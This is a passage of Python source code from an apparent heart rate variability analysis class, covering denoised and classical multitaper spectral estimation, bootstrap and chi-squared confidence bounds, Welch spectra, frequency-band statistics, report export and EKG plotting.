NN_intervals = NN_intervals[~np.isnan(NN_intervals)]
spike_times = np.cumsum(NN_intervals)/1000
dt = 1/fs
T = np.floor(spike_times.max(0)) # Observation duration in seconds
t = np.arange(1.0, T, dt) # Consider a linearly spaced time axis
# Derive the linearly interpolated NN time series
NN_intervals_interpolated = np.interp(t,spike_times,NN_intervals)
K = NN_intervals_interpolated.shape[0]
# Zero centering the time series prior to multi-tapering
NN_intervals_interpolated = NN_intervals_interpolated - np.mean(NN_intervals_interpolated)
NN_intervals_interpolated = NN_intervals_interpolated.reshape((K,1))
return NN_intervals_interpolated, K
def denoised_mt_spectral_estimation(self, NN_intervals_interpolated, N, NW, no_of_tapers, K, fs):
"""
Peform expectation maximization to estimate the denoised Eigen coefficients and denoised Multitaper spectral estimates.
Parameters
----------
NN_intervals_interpolated : np.ndarray
The interpolated inter heart beat interval time series
N : int
Total number of frequency bins
NW : int
Time half bandwidth of multitapering
no_of_tapers : int
Number of tapers considered for Multitapering
K : int
Observation duration in samples
fs : int
Desired sampling frequency of the time series in Hz
Returns
-------
denoised_MT_est : np.ndarray
denoised multitaper estimate of the Power Spectral Density.
denoised_w_est_tapers : np.ndarray
The real and imaginary components of the denoised Eigen-coefficients for each taper.
Modifies
--------
self.psd_mt_denoised : Dict created containing power spectral density at respective frequencies.
'freqs' : np.ndarray
'pwr' : np.ndarray. Power spectral density in (V^2/Hz). 10log10 to convert to dB.
See Also
--------
EKG.data_pre_processing : Load data to the workspace and perform pre-processing: Linearly interpolate the NN time series and zero center.
EKG.direct_MT_Spectral_Estimation : Produce the classical multitaper estimate of the Power Spectral Density.
EKG.plot_estimates : Plot the final PSD estimates with the confidence levels
EKG.generate_PS : Generate power spectrum with desired confidence levels.
"""
# Initializing the parameters
iter_EM = 50 # Maximum EM iterations
Q_initial_factor = 10**(5) # Initialization of Q
sigma_observation = 1*10**(4) # Initialization of Observation noise variance
Sequences = sp.signal.windows.dpss(K, NW, Kmax=no_of_tapers) # Generate the data tapers used for multitapering
self.metadata['analysis_info']['psd_method'] = 'denoised multitaper'
# constructing the inverse FFT matrix (A)
A=np.zeros((K,2*N))
for k in range(0,K):
for n in range(0,N):
A[k,2*n] = np.cos((k+1)*np.pi*(n)/N)
A[k,2*n+1] = -np.sin((k+1)*np.pi*(n)/N)
A= A/N
A = np.delete(A, 1, 1)
denoised_MT_est_tapers = np.zeros((N, no_of_tapers)) # Stores the denoised Eigen spectra for each taper
denoised_w_est_tapers = np.zeros(((2*N - 1),no_of_tapers)) # Stores the denoised Eigen coefficients for each taper
# Derive the denoised Eigen coefficients for each taper using Expectation Maximization
for taper in range(0,no_of_tapers):
print("Estimating denoised Eigen-coefficients for taper", taper+1)
Q = Q_initial_factor*np.eye((2*N - 1)) # Initialize the Q matrix
taper_sequence = Sequences[taper,:]
taper_sequence = taper_sequence.reshape((K,1))
tapered_NN_intervals = taper_sequence*NN_intervals_interpolated # Obtain the tapered time series
tapered_NN_intervals = tapered_NN_intervals.reshape((K,1))
w_est = np.zeros((2*N-1, 1))
P_est = np.zeros((2*N-1, 2*N-1))
regularizer = (10**(-10))*np.eye((2*N-1))
# Expectation Maximization
for r in range(0,iter_EM):
# Expectation step (E - step)
w_est = np.linalg.inv(regularizer+A.T@A + np.linalg.inv(regularizer+Q)*sigma_observation)@(A.T@tapered_NN_intervals) # Update the expected value of the denoised Eigen coefficients
P_est = ((np.linalg.inv(regularizer+A.T@A/(regularizer[0,0]+sigma_observation) + np.linalg.inv(regularizer+Q)))) # Update the covariance of the denoised Eigen coefficients
# Maximization (M - step)
Q = np.diag(np.diag(P_est + w_est@w_est.T)) # Update the Q matrix
sigma_observation = (tapered_NN_intervals.T@tapered_NN_intervals - 2*tapered_NN_intervals.T@A@w_est + np.trace((A.T)@(A)@(P_est + w_est@w_est.T)))/K # Update the observation noise variance
# print(sigma_observation)
# Store estimated denoised Eigen coefficients for all tapers
denoised_w_est_tapers[:,taper] = w_est[:,0]
# Derive and store the denoised Eigen spectra
final_eigen_spectra = w_est@w_est.T
denoised_MT_est_tapers[0,taper] = final_eigen_spectra[0,0]
for n in range(1,N):
denoised_MT_est_tapers[n,taper] = final_eigen_spectra[2*n-1,2*n-1] + final_eigen_spectra[2*n,2*n]
# The final multi-taper estimates are the average spectral estimates across all tapers
denoised_MT_est = np.squeeze(np.mean(np.absolute(denoised_MT_est_tapers), axis=1, keepdims = True))
freq_vector = np.arange(0.0, 0.5*fs, 0.5*fs/N)
self.psd_mt_denoised = {'freqs': freq_vector, 'pwr': denoised_MT_est}
return denoised_MT_est, denoised_w_est_tapers
def direct_MT_Spectral_Estimation(self, NN_intervals_interpolated, N, NW, no_of_tapers, fs):
"""
Produce the classical multitaper estimate of the Power Spectral Density.
Parameters
----------
NN_intervals_interpolated : np.ndarray
The interpolated inter heart beat interval time series
N : int
Total number of frequency bins
NW : int
Time half bandwidth of multitapering
no_of_tapers : int
Number of tapers considered for Multitapering
fs : int
Desired sampling frequency of the time series in Hz
Returns
-------
direct_MT_est : np.ndarray
The classical multitaper estimate of the Power Spectral Density
direct_w_est_tapers : np.ndarray
The real and imaginary components of the Eigen-coefficients for each taper.
Modifies
--------
self.psd_mt : Dict created containing power spectral density at respective frequencies.
'freqs' : np.ndarray
'pwr' : np.ndarray. Power spectral density in (V^2/Hz). 10log10 to convert to dB.
See Also
--------
EKG.data_pre_processing : Load data to the workspace and perform pre-processing: Linearly interpolate the NN time series and zero center.
EKG.denoised_MT_Spectral_Estimation : Peform expectation maximization to estimate the denoised Eigen coefficients and denoised Multitaper spectral estimates.
EKG.plot_estimates : Plot the final PSD estimates with the confidence levels
EKG.generate_PS : Generate power spectrum with desired confidence levels.
EKG.Confidence_Intervals_Bootstrapping : Perform bootstrapping to derive confidence bounds.
EKG.Confidence_Intervals_Chi_squared : Derive confidence bounds based on the Chi-squared approximation.
"""
# Initializing variables
K = NN_intervals_interpolated.shape[0] # Observation duration in samples
Fourier_est = np.zeros((2*N, no_of_tapers),dtype=complex) # Eigen Spectra
direct_MT_est_tapers = np.zeros((2*N,no_of_tapers)) # Classical Multi-taper spectral estimate
direct_w_est_tapers = np.zeros((2*N-1,no_of_tapers)) # The real and imaginery components of the Eigen-coefficients for each taper
dpss_seq = sp.signal.windows.dpss(K, NW, Kmax=no_of_tapers) # Generate the data tapers used for multitapering
self.metadata['analysis_info']['psd_method'] = 'direct multitaper'
# Computing the Eigen-coefficients and the Eigenspectra for each taper
for taper in range(0,no_of_tapers):
temp = NN_intervals_interpolated.T*dpss_seq[taper,:]
Fourier_est[:, taper] = ((np.fft.fft(temp, n = 2*N)).T).reshape((2*N,)) # Eigen-coefficients of the tapered process
direct_w_est_tapers[0,taper] = np.absolute(Fourier_est[0,taper]) # dc component
direct_w_est_tapers[1:2*N-1:2,taper] = np.real(Fourier_est[1:N,taper]) # real components
direct_w_est_tapers[2:2*N-1:2,taper] = np.imag(Fourier_est[1:N,taper]) # imaginary components
direct_MT_est_tapers[:,taper] = (np.absolute(Fourier_est[:, taper]))**2 # Eigenspectral estimates
# The final multi-taper estimates are the average spectral estimates across all tapers
direct_MT_est = np.mean(direct_MT_est_tapers[0:N,:], axis=1, keepdims = True)
freq_vector = np.arange(0.0, 0.5*fs, 0.5*fs/N)
self.psd_mt_direct = {'freqs': freq_vector, 'pwr': direct_MT_est}
return direct_MT_est, direct_w_est_tapers
def confidence_intervals_bootstrapping(self, MT_est, w_est_tapers, CI, bootstrapping_repeats, fs, K, N):
"""
Perform bootstrapping to derive confidence bounds.
Kim et al.,2018
A Multitaper Frequency-Domain Bootstrap Method
In: IEEE Signal Processing Letters
SPL-25.12 (2018), pp. 1805–1809.
Parameters
----------
MT_est : np.ndarray
Multitaper estimate of the Power Spectral Density
w_est_tapers : np.ndarray
Real and imaginery components of the Eigen coefficients of each taper
CI : int
Desired confidence bounds
bootstrapping_repeats : int
Number of bootstrap repeats
fs : int
Sampling frequency
K : int
Observation duration in samples
Returns
-------
Lower_confidence_PSD : np.ndarray
The lower confidence bound of the multi-taper spectral estimates
Upper_confidence_PSD : np.ndarray
The upper confidence bound of the multi-taper spectral estimates
See Also
--------
EKG.denoised_MT_Spectral_Estimation : Peform expectation maximization to estimate the denoised Eigen coefficients and denoised Multitaper spectral estimates.
EKG.direct_MT_Spectral_Estimation : Produce the classical multitaper estimate of the Power Spectral Density.
EKG.plot_estimates : Plot the final PSD estimates with the confidence levels
EKG.generate_PS : Generate power spectrum with desired confidence levels.
EKG.confidence_intervals_chi_squared : Derive confidence bounds based on the Chi-squared approximation
"""
self.metadata['analysis_info']['confidence_intervals'] = 'bootstrapping'
N = MT_est.shape[0] # Number of frequency bins
scaling_fac = (1/fs)*(K / N) # The scaling factor of the final estimates
no_of_tapers = w_est_tapers.shape[1] # The number of tapers used for multi-tapering
denoised_MT_est_bootstrap = np.zeros((N,bootstrapping_repeats)) # Store bootstrapped MT estimates
# Step 2 (Kim et al., 2018): Scale the Eigen coefficients by the power of the MT estimates
scaled_w_hat = w_est_tapers
scaled_w_hat[0,:] = scaled_w_hat[0,:]/np.sqrt(MT_est[0]/2)
for n in range(0,N-1):
S_fac = np.sqrt(MT_est[n+1]/2)
scaled_w_hat[2*n+1,:] = scaled_w_hat[2*n+1,:] / S_fac
scaled_w_hat[2*n+2,:] = scaled_w_hat[2*n+2,:] / S_fac
# Step 3 (Kim et al., 2018): Standardize the concatanated Eigencoefficients to have zero mean and unit variance
for taper in range(0,no_of_tapers):
temp = scaled_w_hat[:,taper]
scaled_w_hat[:,taper] = [temp - np.mean(temp)]/np.sqrt(np.mean((temp - np.mean(temp))**2))
# Perform the bootstrapping
for i in range(0,bootstrapping_repeats):
denoised_MT_est_bootstrap_taper = np.zeros((N,no_of_tapers)) # Bootstrapped MT estimate for each taper
scaled_w_hat_bootstrap = np.zeros((2*N-1,no_of_tapers)) #. Bootstrapped Eigen coefficients
for n in range(0,scaled_w_hat.shape[0]):
temp = scaled_w_hat[n,:]
bootstrap_order = np.random.randint(no_of_tapers, size=no_of_tapers) # Step 4 (Kim et al., 2018): bootstrapping with replacement
scaled_w_hat_bootstrap[n,:] = temp[bootstrap_order]
# Step 5 (Kim et al., 2018): Re-scale the bootstrapped eigen coefficients
if n == 0:
scaled_w_hat_bootstrap[n,:] = scaled_w_hat_bootstrap[n,:]*np.sqrt(MT_est[0]/2)
else:
scaled_w_hat_bootstrap[n,:] = scaled_w_hat_bootstrap[n,:]*np.sqrt(MT_est[(np.ceil(n/2)).astype(int)]/2)
# Step 6 (Kim et al., 2018): Derive the bootstrapped Eigen spectra for each taper
for taper in range(0,no_of_tapers):
temp = scaled_w_hat_bootstrap[:,taper]
temp = temp.reshape((temp.shape[0],1))
final_eigen_spectra_bootstrap = temp@temp.T
denoised_MT_est_bootstrap_taper[0,taper] = final_eigen_spectra_bootstrap[0,0]
for n in range(0,N-1):
denoised_MT_est_bootstrap_taper[n+1,taper] = final_eigen_spectra_bootstrap[2*n+1,2*n+1]+final_eigen_spectra_bootstrap[2*n+2,2*n+2]
# Derive the bootstrapped Multitaper Spectral Estimates
temp = scaling_fac*np.mean(np.absolute(denoised_MT_est_bootstrap_taper), axis=1, keepdims = True)
denoised_MT_est_bootstrap[:,i] = temp.reshape((temp.shape[0],))
# Specify the lower and upper percentiles based on the desired Confidence Intervals
lower_percentile = (np.floor(((1-CI)/2)*bootstrapping_repeats)).astype(int)
upper_percentile = (np.ceil(((1+CI)/2)*bootstrapping_repeats)).astype(int)
Upper_confidence_PSD = np.zeros((N,1))
Lower_confidence_PSD = np.zeros((N,1))
# Derive the confidence bounds using the upper and lower percentiles
for n in range(0,N):
temp = np.sort(denoised_MT_est_bootstrap[n,:])
Lower_confidence_PSD[n] = temp[lower_percentile]
Upper_confidence_PSD[n] = temp[upper_percentile]
return Lower_confidence_PSD.reshape((N,)), Upper_confidence_PSD.reshape((N,))
def Confidence_intervals_chi_squared(self, MT_est, CI, no_of_tapers, N):
"""
Derive confidence bounds based on the Chi-squared approximation.
Percival & Walden, 1993
In: Spectral analysis for Physical Applications
Pp. 255 & 343
Parameters
----------
MT_est : np.ndarray
Multitaper estimate of the Power Spectral Density
CI : int
The desired confidence bounds
no_of_tapers : int
Number of tapers used for multitapering
Returns
-------
Lower_confidence_PSD : np.ndarray
The lower confidence bound of the multi-taper spectral estimates
Upper_confidence_PSD : np.ndarray
The upper confidence bound of the multi-taper spectral estimates
See Also
--------
EKG.denoised_mt_spectral_estimation : Peform expectation maximization to estimate the denoised Eigen coefficients and denoised Multitaper spectral estimates.
EKG.direct_mt_spectral_estimation : Produce the classical multitaper estimate of the Power Spectral Density.
EKG.plot_estimates : Create figure containing the final PSD estimates with the confidence levels.
EKG.generate_PS : Generate power spectrum with desired confidence levels.
EKG.confidence_intervals_bootstrapping : Perform bootstrapping to derive confidence bounds.
"""
self.metadata['analysis_info']['confidence_intervals'] = 'chi_sq'
# The Degrees of freedom of the Chi-squared distribution equals to twice the number of tapers used in multi-tapering
Degree_of_freedom = 2*no_of_tapers
Lower_confidence_PSD = (Degree_of_freedom / chi2.ppf((1+CI)/2, df=Degree_of_freedom)) * abs(MT_est);
Upper_confidence_PSD = (Degree_of_freedom / chi2.ppf((1-CI)/2, df=Degree_of_freedom)) * abs(MT_est);
return Lower_confidence_PSD.reshape((N,)), Upper_confidence_PSD.reshape((N,))
def plot_estimates(self, MT_PSD_est, Lower_confidence_PSD, Upper_confidence_PSD, fs):
"""
Create figure containing the final PSD estimates with the confidence levels.
Parameters
----------
MT_est : np.ndarray
Multitaper estimate of the Power Spectral Density
Lower_confidence_PSD : np.array
The lower confidence bound of the multi-taper spectral estimates
Upper_confidence_PSD : np.array
The upper confidence bound of the multi-taper spectral estimates
fs : int
Sampling frequency
Returns
-------
fig : figure
Plot of the final PSD estimates with confidence levels
See Also
--------
EKG.generate_PS : Generate power spectrum with desired confidence levels
"""
N = MT_PSD_est.shape[0]
freq_vector = np.arange(0.0, 0.5*fs, 0.5*fs/N)
y_axis_upper_bound = 20*10**4
fig, ax = plt.subplots(figsize=(15,3))
freq_1 = np.max(freq_vector[freq_vector<= 0.04])
ax.plot([freq_1,freq_1],[0,y_axis_upper_bound], 'b--')
freq_2 = np.max(freq_vector[freq_vector<= 0.15])
ax.plot([freq_2,freq_2],[0,y_axis_upper_bound], 'b--')
freq_3 = np.max(freq_vector[freq_vector<= 0.40])
ax.plot([freq_3,freq_3],[0,y_axis_upper_bound], 'b--')
ax.plot(freq_vector, MT_PSD_est, color="black")
ax.fill_between(freq_vector, Lower_confidence_PSD, Upper_confidence_PSD, color='k', alpha=.4)
plt.xlabel("frequency ($Hz$)")
plt.ylabel("Power ($ms^2/Hz$)")
ax.set_xlim(0, 0.4)
plt.subplots_adjust(bottom=0.15)
# plt.xlim([np.min(freq_vector), np.max(freq_vector)])
#plt.ylim([0, y_axis_upper_bound])
return fig
def calc_psd_welch(self, itype, window):
"""
Calculate welch power spectrum.
Parameters
----------
itype : str {'rr', 'nn'}
Interval type with which to calculate the power spectrum.
'rr' is uncleaned data. 'nn' is normal intervals (cleaned).
window : str
Windowing function.
Options from scipy.signal welch
Wrapper default 'hamming'
See Also
--------
EKG.calc_psd_mt : Calculate multitaper power spectrum.
"""
self.metadata['analysis_info']['psd_method'] = 'welch'
self.metadata['analysis_info']['psd_window'] = window
# specify data
if itype == 'rr':
ii = self.rr
elif itype == 'nn':
ii = self.nn[~np.isnan(self.nn)]
# set nfft to guidelines of power of 2 above len(data), min 256 (based on MATLAB guidelines)
nfft = max(256, 2**(int(np.log2(len(self.ii_interp))) + 1))
# Adapt 'nperseg' according to the total duration of the II series (5min threshold = 300000ms)
if max(np.cumsum(ii)) < 300000:
nperseg = nfft
else:
nperseg = 300
# default overlap = 50%
f, Pxx = welch(self.ii_interp, fs=4, window=window, scaling = 'density', nfft=nfft,
nperseg=nperseg)
self.psd_welch = {'freqs':f, 'pwr': Pxx, 'nfft': nfft, 'nperseg': nperseg}
def calc_fbands(self, method):
"""
Calculate frequency band measures.
Parameters
----------
method : str {'welch', 'mt'}
Method to be used to calculate frequency band measures.
Notes
-----
Modified from pyHRV
Normalized units are normalized to total lf + hf power, according to Heathers et al. (2014)
"""
if method is None:
method = input('Please enter PSD method (options: "welch", "mt_direct", "mt_denoised"): ')
if method == 'welch':
psd = self.psd_welch
if method == 'mt_direct':
psd = self.psd_mt_direct
elif method == 'mt_denoised':
psd = self.psd_mt_denoised
# set frequency bands
ulf = None
vlf = (0.000, 0.04)
lf = (0.04, 0.15)
hf = (0.15, 0.4)
args = (ulf, vlf, lf, hf)
names = ('ulf', 'vlf', 'lf', 'hf')
freq_bands = dict(zip(names, args))
#self.freq_bands = freq_bands
# get indices and values for frequency bands in calculated spectrum
fband_vals = {}
for key in freq_bands.keys():
fband_vals[key] = {}
if freq_bands[key] is None:
fband_vals[key]['idx'] = None
fband_vals[key]['pwr'] = None
else:
# lower limit not inclusive
fband_vals[key]['idx'] = np.where((freq_bands[key][0] < psd['freqs']) & (psd['freqs'] <= freq_bands[key][1]))[0]
fband_vals[key]['pwr'] = psd['pwr'][fband_vals[key]['idx']]
self.psd_fband_vals = fband_vals
# calculate stats
total_pwr = sum(filter(None, [np.sum(fband_vals[key]['pwr']) for key in fband_vals.keys()]))
freq_stats = {'totals':{'total_pwr': total_pwr}}
# by band
for key in freq_bands.keys():
freq_stats[key] = {}
freq_stats[key]['freq_range'] = str(freq_bands[key])
if freq_bands[key] is None:
freq_stats[key]['pwr_ms2'] = None
freq_stats[key]['pwr_peak'] = None
freq_stats[key]['pwr_log'] = None
freq_stats[key]['pwr_%'] = None
freq_stats[key]['pwr_nu'] = None
else:
freq_stats[key]['pwr_ms2'] = np.sum(fband_vals[key]['pwr'])
peak_idx = np.where(fband_vals[key]['pwr'] == max(fband_vals[key]['pwr']))[0][0]
freq_stats[key]['pwr_peak'] = psd['freqs'][fband_vals[key]['idx'][peak_idx]]
freq_stats[key]['pwr_log'] = np.log(freq_stats[key]['pwr_ms2'])
freq_stats[key]['pwr_%'] = freq_stats[key]['pwr_ms2']/freq_stats['totals']['total_pwr']*100
# add normalized units to lf & hf bands
for key in ['lf', 'hf']:
freq_stats[key]['pwr_nu'] = freq_stats[key]['pwr_ms2']/(freq_stats['lf']['pwr_ms2'] + freq_stats['hf']['pwr_ms2'])*100
# add lf/hf ratio
freq_stats['totals']['lf/hf'] = freq_stats['lf']['pwr_ms2']/freq_stats['hf']['pwr_ms2']
self.freq_stats = freq_stats
def calc_fstats(self, itype, method, bandwidth, window):
"""
Calculate commonly used frequency domain HRV statistics.
Parameters
----------
itype : str {'rr, 'nn'}
Interval type.
'rr' is uncleaned data. 'nn' is normal intervals (cleaned).
method : str, {'mt, 'welch'}
Method to compute power spectra.
'mt' is multitaper.
bandwith : float
Bandwidth for multitaper power spectral estimation.
window : str
Window to use for welch FFT. See mne.time_frequency.psd_array_multitaper for options.
See Also
--------
EKG.calc_tstats : Calculate commonly used time domain HRV statistics.
EKG.hrv_stats : Calculate both time and frequency domain HRV statistics on IBI object.
"""
# resample & interpolate tachogram
print('Interpolating and resampling tachogram...')
self.interpolate_IBI(itype)
# calculate power spectrum
print('Calculating power spectrum...')
if method == 'mt':
self.calc_psd_mt(bandwidth)
elif method == 'welch':
self.calc_psd_welch(itype, window)
#calculate frequency domain statistics
print('Calculating frequency domain measures...')
self.calc_fbands(method)
print('Frequency measures stored in obj.freq_stats\n')
def hrv_stats(self, itype='nn', nn_file=None, method='mt_denoised', bandwidth=0.01, window='hamming'):
"""
Calculate both time and frequency domain HRV statistics on IBI object.
Parameters
----------
itype : str {'nn', 'rr'}
Interbeat interval object type to use for calculations.
'rr' is uncleaned data. 'nn' is normal intervals (cleaned)
nn_file : str, optional
Path to csv file containing cleaned nn values, if nn values were previously exported.
method : str, {'mt_denoised', 'mt_direct', 'welch'}
Method to use when calculating power spectrum.
'mt' is multitaper
bandwidth : float, default 0.01
Bandwidth used when calculating frequency domain statistics.
window : str , default 'hamming'
Window type used for welch power spectral analysis.
Options from scipy.signal welch.
"""
self.metadata['analysis_info']['itype'] = itype
# load nn attribute if data was cleaned previously
if itype == 'nn' and nn_file is not None:
# read in metadata
with open(nn_file, 'r') as f:
line1 = [x for x in f.readline().split(' ')]
line2 = [x for x in f.readline().split(' ')]
self.metadata['analysis_info']['mw_size'] = float(line1[6])
self.metadata['analysis_info']['upshift'] = float(line1[10].split('.\n')[0])
self.metadata['analysis_info']['artifacts_rmvd'] = int(line2[5])
# load nn intervals
self.nn = np.loadtxt(nn_file)
else:
self.metadata['analysis_info']['artifacts_rmvd'] = str(str(len(self.rpeak_artifacts)) + ' false peaks (removed); ' + str(len(self.rpeaks_added)) + ' missed peaks (added); ' + str(len(self.ibi_artifacts)) + ' ibis removed (from NaN data)')
# create nn variable if it doesn't exist
try:
self.nn
except AttributeError:
self.nn = self.rr
# calculate statistics
self.calc_tstats(itype)
self.calc_fstats(itype, method, bandwidth, window)
print('Done.')
def to_spreadsheet(self, spreadsheet, savedir):
"""
Append calculations as a row in master spreadsheet.
Information exported includes arrays 'data', 'rpeaks', 'rr', 'rr_diff', 'rr_diffsq', 'rpeak_artifacts', 'rpeaks_added', 'ibi_artifacts',
'rpeaks_df', 'nn', 'nn_diff', 'nn_diffsq', 'rr_arts', 'ii_interp', 'psd_mt_direct', 'psd_mt_denoised', psd_welch', 'psd_fband_vals' if calculated.
Parameters
----------
savedir : str
Path to directory where spreadsheet will be saved.
spreadsheet : str
Name of output file.
Notes
-----
Creates new spreadsheet if output file does not exist.
"""
# this is from before division to two classes. 'data' and 'rpeaks' arrays shouldn't exist in IBI object.
arrays = ['data', 'rpeaks', 'rr', 'rr_diff', 'rr_diffsq', 'rpeak_artifacts', 'rpeaks_added', 'ibi_artifacts',
'rpeaks_df', 'nn', 'nn_diff', 'nn_diffsq', 'rr_arts', 'ii_interp', 'psd_mt_direct', 'psd_mt_denoised', 'psd_welch', 'psd_fband_vals']
data = {k:v for k,v in vars(self).items() if k not in arrays}
reform = {(level1_key, level2_key, level3_key): values
for level1_key, level2_dict in data.items()
for level2_key, level3_dict in level2_dict.items()
for level3_key, values in level3_dict.items()}
df = pd.DataFrame(reform, index=[0])
df.set_index([('metadata', 'file_info', 'in_num'), ('metadata', 'file_info', 'start_time')], inplace=True)
savename = os.path.join(savedir, spreadsheet)
if os.path.exists(savename):
with open(savename, 'a') as f:
df.to_csv(f, header=False, line_terminator='\n')
print('Data added to {}'.format(spreadsheet))
else:
with open(savename, 'a') as f:
df.to_csv(f, header=True, line_terminator='\n')
print('{} does not exist. Data saved to new spreadsheet'.format(spreadsheet))
def to_report(self, savedir=None, fmt='txt'):
"""
Export HRV statistics as a csv report.
Parameters
----------
savedir : str, optional
Path to directory in which to save report.
fmt: str, {'txt', 'json'}
Output format.
See Also
--------
EKG.hrv_stats : Calculate both time and frequency domain HRV statistics on IBI object.
EKG.calc_fstats : Calculate commonly used frequency domain HRV statistics.
EKG.calc_tstats : Calculate commonly used time domain HRV statistics.
EKG.denoised_mt_spectral_estimation : Peform expectation maximization to estimate the denoised Eigen coefficients and denoised Multitaper spectral estimates.
EKG.direct_mt_spectral_estimation : Produce the classical multitaper estimate of the Power Spectral Density.
"""
# set save directory
if savedir is None:
savedir = os.getcwd()
chngdir = input('Files will be saved to ' + savedir + '. Change save directory? [Y/N] ')
if chngdir == 'Y':
savedir = input('New save directory: ')
if not os.path.exists(savedir):
createdir = input(savedir + ' does not exist. Create directory? [Y/N] ')
if createdir == 'Y':
os.makedirs(savedir)
else:
savedir = input('Try again. Save directory: ')
if not os.path.exists(savedir):
print(savedir + ' does not exist. Aborting. ')
return
elif not os.path.exists(savedir):
print(savedir + ' does not exist. Creating directory...')
os.makedirs(savedir)
else:
print('Files will be saved to ' + savedir)
# export everything that isn't a dataframe, series, or array
arrays = ['data', 'rpeaks', 'rr', 'rr_diff', 'rr_diffsq', 'rpeak_artifacts', 'rpeaks_added', 'ibi_artifacts', 'rpeaks_df', 'nn', 'nn_diff', 'nn_diffsq', 'rr_arts', 'ii_interp', 'psd_mt_direct', 'psd_mt_denoised', 'psd_fband_vals']
data = {k:v for k,v in vars(self).items() if k not in arrays}
# set savename info
if 'epoch' in self.metadata['file_info'].keys():
saveinfo = ('_'.join((self.metadata['file_info']['fname'].split('_')[:6]))).split('.')[0]
else:
saveinfo = ('_'.join((self.metadata['file_info']['fname'].split('_')[:5]))).split('.')[0]
# save calculations
if fmt == 'txt':
savename = saveinfo + '_HRVstats.txt'
file = os.path.join(savedir, savename)
with open(file, 'w') as f:
for k, v in data.items():
if type(v) is not dict:
line = k+' '+str(v) + '\n'
f.write(line)
elif type(v) is dict:
line = k + '\n'
f.write(line)
for kx, vx in v.items():
if type(vx) is not dict:
line = '\t'+ kx + ' ' + str(vx) + '\n'
f.write(line)
else:
line = '\t' + kx + '\n'
f.write(line)
for kxx, vxx in vx.items():
line = '\t\t' + kxx + ' ' + str(vxx) + '\n'
f.write(line)
elif fmt == 'json':
savename = saveinfo + '_HRVstats_json.txt'
file = os.path.join(savedir, savename)
with open(file, 'w') as f:
json.dump(data, f, indent=4)
# save power spectra for later plotting
try:
self.psd_mt_denoised
except AttributeError:
pass
else:
savepsd = saveinfo + '_psd_mt_denoised.txt'
psdfile = os.path.join(savedir, savepsd)
psd_mt_df = pd.DataFrame(self.psd_mt_denoised)
psd_mt_df.to_csv(psdfile, index=False)
try:
self.psd_mt_direct
except AttributeError:
pass
else:
savepsd = saveinfo + '_psd_mt_direct.txt'
psdfile = os.path.join(savedir, savepsd)
psd_mt_df = pd.DataFrame(self.psd_mt_direct)
psd_mt_df.to_csv(psdfile, index=False)
try:
self.psd_welch
except AttributeError:
pass
else:
savepsd = saveinfo + '_psd_welch.txt'
psdfile = os.path.join(savedir, savepsd)
psd_mt_df = pd.DataFrame(self.psd_welch)
psd_mt_df.to_csv(psdfile, index=False)
# plotting methods
def plotpeaks(self, rpeaks=True, ibi=True, thres = True):
"""
Plot EKG class instance.
Visualization of raw EKG data, smoothed EKG data, R peaks, IBI length and EKG threshold detection line.
Parameters
----------
rpeaks : bool, default True
Shows r peaks on plot if set to True.
ibi : bool, default True
Displays plot with IBI time leading up to each r peak if set to True
thres : bool, default True
Shows threshold line if set to True.
"""
# set number of panels
if ibi == True:
plots = ['ekg', 'ibi']
if thres == True:
data = [self.data, self.rpeaks_df['ibi_ms']]
if thres == False:
if self.metadata['analysis_info']['smooth'] == False:
data = [self.data['Raw'], self.rpeaks_df['ibi_ms']]
if self.metadata['analysis_info']['smooth'] == True:
data = [self.data[['Raw', 'raw_smooth']], self.rpeaks_df['ibi_ms']]
else:
plots = ['ekg']
if thres == True:
data = [self.data]
if thres == False:
if self.metadata['analysis_info']['smooth'] == False:
data = [self.data['Raw']]
if self.metadata['analysis_info']['smooth'] == True:
data = [self.data[['Raw', 'raw_smooth']]]
fig, axs = plt.subplots(len(plots), 1, sharex=True, figsize = [9.5, 6])
if len(plots) > 1:
for dat, ax, plot in zip(data, axs, plots):
if plot == 'ekg' and rpeaks == True:
ax.plot(dat, zorder = 1)
ax.scatter(self.rpeaks.index, self.rpeaks.values, color='red', zorder = 2)
ax.set_ylabel('EKG (mV)')
if self.metadata['analysis_info']['pan_tompkins'] == True:
ax.legend(('raw data', 'rpeak'), fontsize = 'small')
else:
if thres == True:
if self.metadata['analysis_info']['smooth'] == True:
ax.legend(('raw data', 'threshold line', 'smoothed data', 'rpeak'), fontsize = 'small')
else:
ax.legend(('raw data', 'threshold line', 'rpeak'), fontsize = 'small')
else:
if self.metadata['analysis_info']['smooth'] == True:
ax.legend(('raw data', 'smoothed data', 'rpeak'), fontsize = 'small')
else:
ax.legend(('raw data', 'rpeak'), fontsize = 'small')
elif plot == 'ibi':
ax.plot(dat, color='grey', marker='.', markersize=8, markerfacecolor=(0, 0, 0, 0.8), markeredgecolor='None')
ax.set_ylabel('Inter-beat interval (ms)')
ax.set_xlabel('Time')
ax.margins(x=0)
# show microseconds for mouse-over
ax.format_xdata = lambda d: mdates.num2date(d).strftime('%H:%M:%S.%f')[:-3]
else:
for dat, plot in zip(data, plots):
if plot == 'ekg' and rpeaks == True:
axs.plot(dat, zorder = 1)
axs.scatter(self.rpeaks.index, self.rpeaks.values, color='red', zorder = 2)
axs.set_ylabel('EKG (mV)')
axs.set_xlabel('Time')
axs.margins(x=0)
# show microseconds for mouse-over
axs.format_xdata = lambda d: mdates.num2date(d).strftime('%H:%M:%S.%f')[:-3]
def generate_welch(self, method='welch', dB=False, bands=True, save=True, savedir=None):
"""
Plot power spectrum with method of choice and save if appropriate.
Parameters
----------
method : str, {'welch', 'mt'}
Method by which power spectrum is to be calculated.
'mt' is multitaper.
dB : bool, default False
If True, decibals used as unit for power spectral density instead of s^2/Hz
bands : bool, default True
If True, spectrum plotted colored by frequency band.
save : bool, default True
If True, power spectrum will be saved as well as plotted.
savedir : str, optional
Path to directory where spectrum is to be saved.
See Also
--------
EKG.calc_psd_welch : Calculate welch power spectrum.
"""
# set title
title = self.metadata['file_info']['in_num'] + ' ' + self.metadata['file_info']['start_date'] + '\n' + self.metadata['file_info']['sleep_stage'] + ' ' + self.metadata['file_info']['cycle']
try:
n.metadata['file_info']['epoch']
except:
pass
else:
title = title + ' ' + n.metadata['file_info']['epoch']
# set data to plot
psd = self.psd_welch
# transform units
if dB == True:
pwr = 10 * np.log10(psd['pwr'])
ylabel = 'Power spectral density (dB)'
else:
pwr = psd['pwr']/1e6 # convert to seconds
ylabel = 'Power spectral density (s^2/Hz)'
fig, ax = plt.subplots()
# plot just spectrum
if bands == False:
ax.plot(psd['freqs'], pwr)
# or plot spectrum colored by frequency band
elif bands == True:
